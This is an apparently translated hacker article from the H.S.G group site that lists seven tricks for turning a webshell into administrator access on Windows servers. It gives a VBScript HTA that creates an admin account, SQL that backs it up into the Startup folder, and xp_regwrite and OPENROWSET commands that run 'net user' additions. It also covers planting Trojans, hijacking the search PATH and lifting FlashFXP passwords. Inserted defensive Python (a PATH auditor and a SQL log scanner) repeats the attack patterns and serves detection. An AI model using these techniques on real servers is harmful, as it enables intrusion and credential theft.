Techniques for permission escalation and Connection

Author: 4lert
From: [H.S.G] http://www.3hsg.net
PS: If you reprint this, please credit H.S.G and the author, thanks!

There are many ways to escalate privileges on a network host; boiled down, they come to overflows, defects in third-party software, and social engineering. What this article discusses is a set of tricks used during the privilege-escalation process. Once these tricks are mastered, a webshell can be turned into terminal login rights quickly.

1. The inertial-click method. This method makes full use of people's curiosity, so it is really an application of psychology. Once we have a webshell, and attempts at overflow or at exploiting vulnerabilities in common third-party software have failed, this method can be used. Specifically: on the Administrator's desktop, create a shortcut pointing to a directory in which we have permission to create files. The name is up to you, for example "Administrator check" or "server intrusion". Inside that directory, create nested directories with the same name, ideally 5 or 6 levels deep, and in the last sub-directory place a Trojan whose icon is the folder icon. An administrator usually keeps double-clicking down through the directories, and when the inertial click happens, he double-clicks the Trojan. The rest is up to you: you have a zombie.
2. The MSSQL backup-to-HTA method. In the past, DB_OWNER privilege was used to back up a BAT file into the system's startup items, but the success rate of that remains low. The reason is that during a database backup, whether a log backup or a differential backup, a large amount of other data is written into the file, while the command length a BAT file tolerates is limited. So instead we back the file up as an HTA file. HTA is short for HTML Application. With it we write an HTA file and back it up into the Startup folder.

<Script language="VBScript">
' Create a local user 4lert (password 4lert) through the WinNT ADSI provider and add it to Administrators
Set wsnetwork = CreateObject("WSCRIPT.NETWORK")
OS = "WinNT://" & wsnetwork.ComputerName
Set ob = GetObject(OS)
Set oe = GetObject(OS & "/Administrators,group")
Set od = ob.Create("user", "4lert")
od.SetPassword "4lert"
od.SetInfo
Set of = GetObject(OS & "/4lert,user")
oe.Add OS & "/4lert"
</Script>
<Script language="javascript">window.close();</script>


In the end, I found that using the Wscript.Network component had the highest success rate. The code above creates a user named 4lert whose password is also 4lert. Next we convert this code to hexadecimal. Only the LOG backup code is given here.
alter database database_name set recovery full --
create table [4lert] (cmd image) --
backup log database_name to disk = 'c:\ak.bak' with init --
insert into [4lert] (cmd) values (values) --
backup log database_name to disk = 'c:\E~1\alluse~1\"start" Menu\Program start\shit.hta' --
drop table [4lert] --


Of course, this method still has its limitations; you can extend it further.

3. Use of environment variables. Sometimes viewing the system variables from a webshell brings a surprise. The default value of the Path environment variable is %SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem. If PHP is installed, the variable may instead read c:\php;%SystemRoot%\system32;%SystemRoot%\System32\Wbem. That can be taken advantage of, because c:\php comes before the system's default directories. By search order, when ipconfig is executed the system first looks in c:\php for a file named ipconfig.exe, and if one exists, that copy is run first. So if a Trojan named ipconfig.exe is uploaded into c:\php, the Trojan under c:\php runs whenever the Administrator types ipconfig at the command line, and in this way we obtain system privileges. It is also quite concealed and generally not easily discovered. It is not a bad way of escalating privileges.
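The same search-order rule can be checked from the defender's side. The following is an added example, not code from the original article: it parses a PATH value, expands %SystemRoot% from a supplied environment map, reports entries that are searched before the %SystemRoot% directories, and lists executables in those entries that shadow a system tool of the same name. The PATH values, environment map and directory listings are constructed inputs, so it runs offline; in practice you would feed it the real PATH and real directory listings.

```python
"""Audit a Windows PATH value for directories that are searched before the
%SystemRoot% directories and for executables inside them that shadow a
system tool of the same name. Added example, not code from the original
article; the PATH values, environment map and directory listings below are
constructed inputs."""
import ntpath

EXEC_EXTS = (".exe", ".com", ".bat", ".cmd")


def expand(value, env):
    """Expand %NAME% references using the supplied environment map."""
    for name, val in env.items():
        value = value.replace(f"%{name}%", val)
    return value


def norm(path):
    """Case-insensitive, separator-normalised form of a Windows path."""
    return ntpath.normcase(ntpath.normpath(path))


def under_root(path, root):
    """True when path is root itself or lies below it."""
    return path == root or path.startswith(root + "\\")


def audit_path(path_value, env, listing):
    """Return (risky_dirs, shadowed).

    risky_dirs: PATH entries outside %SystemRoot% that come before the first
    %SystemRoot% entry, i.e. a binary dropped there wins the lookup.
    shadowed: executable name -> risky directory, for names that also exist
    in one of the %SystemRoot% entries (e.g. a rogue ipconfig.exe).
    """
    root = norm(env["SystemRoot"])
    entries = [norm(expand(e, env)) for e in path_value.split(";") if e.strip()]
    files = {norm(d): {n.lower() for n in names} for d, names in listing.items()}

    risky = []
    for entry in entries:
        if under_root(entry, root):
            break                      # everything after this is searched later
        risky.append(entry)

    system_exes = set()
    for entry in entries:
        if under_root(entry, root):
            system_exes |= {n for n in files.get(entry, ()) if n.endswith(EXEC_EXTS)}

    shadowed = {}
    for entry in risky:
        for name in sorted(files.get(entry, ())):
            if name.endswith(EXEC_EXTS) and name in system_exes:
                shadowed[name] = entry
    return risky, shadowed


# Constructed sample inputs (not taken from a real host)
ENV = {"SystemRoot": r"C:\WINDOWS"}
PATH_DEFAULT = r"%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem"
PATH_WITH_PHP = r"c:\php;" + PATH_DEFAULT          # PHP prepended, as in the article
PATH_PHP_LAST = PATH_DEFAULT + r";c:\php"          # PHP appended: system dirs win

LISTING = {
    r"C:\WINDOWS\system32": {"ipconfig.exe", "cmd.exe", "net.exe"},
    r"C:\WINDOWS": {"explorer.exe"},
    r"C:\WINDOWS\System32\Wbem": {"wmic.exe"},
    r"c:\php": {"php.exe", "ipconfig.exe"},        # constructed: a planted ipconfig.exe
}

if __name__ == "__main__":
    for label, value in (("default", PATH_DEFAULT),
                         ("php first", PATH_WITH_PHP),
                         ("php last", PATH_PHP_LAST)):
        risky, shadowed = audit_path(value, ENV, LISTING)
        print(f"{label}: risky={risky} shadowed={shadowed}")
```

The check is deliberately order-aware: the same c:\php entry is flagged only when it precedes the %SystemRoot% entries, which is exactly the condition the article relies on. A hardening follow-up is to keep third-party directories after the system directories and to restrict write access to any directory that must stay in front.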

4. FlashFXP privilege escalation. This is actually a very effective method, because from it we can usually guess the Administrator's terminal login password. If the FlashFXP installation directory is found in the shell, download the three files sites.dat, quick.dat and Stats.dat and overwrite the corresponding files of a local FlashFXP installation with them. Open FlashFXP and the sites the Administrator has logged on to are visible. The password is displayed as asterisks and can be read with an asterisk password viewer. With the password obtained, social engineering or further intrusion can follow.

5. Privilege escalation through third-party services. The two most typical programs are NetBox and Magic Winmail. Both are installed to run as SYSTEM by default, so they can easily call net to add users. With Magic Winmail, a PHP Trojan placed under server\webmail can execute net to add a user.

6. Privilege escalation in sandbox mode. Sandbox mode solves the problem of xp_cmdshell and other extended stored procedures being unavailable. Sandbox mode is disabled by default, so xp_regwrite is needed to enable it:

exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode', 'REG_DWORD', 1


Then run the commands to add an account with the 4lert username and 4lert password:
select * from openrowset('microsoft.jet.oledb.4.0', ';database=c:\windows\system32\ias\ias.mdb', 'select shell("cmd.exe /c net user test 1234 /add")')

select * from openrowset('microsoft.jet.oledb.4.0', ';database=c:\windows\system32\ias\ias.mdb', 'select shell("cmd.exe /c net localgroup Administrators test /add")')
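Both the backup-to-HTA trick of section 2 and the SandBoxMode/OPENROWSET commands of this section leave distinctive statements in SQL Server trace or audit output. The following is an added example, not part of the original article, that scans a list of constructed log lines for those patterns: a backup written into a Startup folder or to a file without a backup extension, xp_regwrite touching the Jet SandBoxMode value, shell() executed through OPENROWSET with the Jet provider, and any xp_cmdshell call. The rule names and the sample log lines are constructed for the example.

```python
"""Flag SQL Server statements that match the abuse patterns this article
describes: a backup written to a Startup folder or to a non-backup file
extension (the HTA trick), xp_regwrite touching the Jet SandBoxMode value,
shell() executed through OPENROWSET with the Jet provider, and xp_cmdshell.
Added example, not code from the original article; the log lines below are
constructed."""
import re

RULES = [
    ("jet-sandbox-enable",
     re.compile(r"xp_regwrite\b.*\\jet\\4\.0\\engines.*sandboxmode", re.I)),
    ("jet-shell-exec",
     re.compile(r"openrowset\s*\(\s*'?microsoft\.jet\.oledb.*\bshell\s*\(", re.I)),
    ("backup-to-startup",
     re.compile(r"backup\s+(?:log|database)\b.*to\s+disk\s*=.*(?:startup|start\s*menu)", re.I)),
    ("xp_cmdshell", re.compile(r"\bxp_cmdshell\b", re.I)),
]

# Destination of BACKUP ... TO DISK = '<path>' [WITH ...] [--]
BACKUP_DEST = re.compile(r"to\s+disk\s*=\s*'?(.+?)'?\s*(?:with\b|--|$)", re.I)
BACKUP_EXTS = (".bak", ".trn")   # extensions a legitimate backup normally uses


def classify(stmt):
    """Return the list of rule names a single statement triggers."""
    tags = [name for name, rx in RULES if rx.search(stmt)]
    m = BACKUP_DEST.search(stmt)
    if m:
        dest = m.group(1).strip().strip("'\"").lower()
        if not dest.endswith(BACKUP_EXTS):
            tags.append("backup-odd-extension")
    return tags


def scan(lines):
    """Return [(line_number, tags)] for every line that triggers a rule."""
    hits = []
    for num, line in enumerate(lines, 1):
        tags = classify(line)
        if tags:
            hits.append((num, tags))
    return hits


# Constructed sample log lines (not from a real server)
LOG = [
    "select name from sys.databases",
    "backup database app to disk = 'd:\\backups\\app.bak' with init",
    "backup log app to disk = 'c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\update.hta'",
    "exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\\Microsoft\\Jet\\4.0\\Engines', 'SandBoxMode', 'REG_DWORD', 1",
    "select * from openrowset('microsoft.jet.oledb.4.0', ';database=c:\\windows\\system32\\ias\\ias.mdb', 'select shell(\"cmd.exe /c net user test 1234 /add\")')",
    "exec master..xp_cmdshell 'dir c:\\'",
]

if __name__ == "__main__":
    for num, tags in scan(LOG):
        print(f"line {num}: {', '.join(tags)}")
```

The two backup rules are independent on purpose: a backup aimed at a Startup folder is suspicious regardless of extension, and a backup to an .hta, .bat or other executable extension is suspicious regardless of location. On the prevention side, the same patterns point at the settings to lock down: the web application's database login should not hold db_owner, SandBoxMode should stay at its default, and ad hoc OPENROWSET access and xp_cmdshell should remain disabled unless there is a documented need.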


7. Binding a Trojan to software the administrator uses often. If the webshell's permissions are a little higher and no third-party software vulnerability is available to exploit, we can look at the Administrator's desktop or Start menu for software he is likely to use often, then download the shortcut to find the installation directory. If we have permission to modify that directory, we can bind the software. Then we only need to wait for the Administrator to launch the bundled program. This method is somewhat opportunistic, but it is still one method of privilege escalation.

All the methods above are tricks; used well, they let you quickly obtain the permissions of the target server. Overflow-based escalation methods are, of course, outside the scope of this article.
